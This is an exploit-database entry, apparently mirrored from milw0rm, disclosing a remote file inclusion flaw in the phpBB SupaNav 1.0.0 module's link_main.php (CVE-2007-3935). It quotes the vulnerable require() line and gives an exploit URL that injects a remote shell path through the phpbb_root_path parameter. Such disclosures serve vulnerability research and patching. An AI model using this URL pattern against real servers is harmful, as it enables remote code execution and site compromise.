[] NeoSense
E X P L O I T S
title author type platform port cve id

phpBB Module SupaNav 1.0.0 - 'link_main.php' Remote File Inclusion

Author: bd0rk
type: webapps
platform: php
port: 
date_added: 2007-07-17 
date_updated:  
verified: 1 
codes: OSVDB-36275;CVE-2007-3935 
tags: 
aliases:  
screenshot_url:  
application_url: 
        phpBB Module SupaNav 1.0.0 (link_main.php) Remote File Inclusion Vulnerability


Vendor: http://www.phpbbhacks.com/download/8003

Download: http://www.phpbbhacks.com/load.php?id=8003

Founder: bd0rk

Website 1: www.soh-crew.it.tt

Website 2: www.school-of-hack.net

Contact: bd0rk[at]hackermail.com

ICQ: 249-613-511

Greetings: str0ke, TheJT, rgod, Kacper, GolD_M

Vulnerable Code in link_main.php:

--------------------------------------------------------------------------------------

require($phpbb_root_path.'language/lang_'.$userdata['user_lang'].'/lang_nav.'.$phpEx);

--------------------------------------------------------------------------------------

$phpbb_root_path is not declared before require

[+]Exploit: http://[target]/[directory]/link_main.php?phpbb_root_path=[ShellCode]


####The 18 years old german Hacker bd0rk####

# milw0rm.com [2007-07-18]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.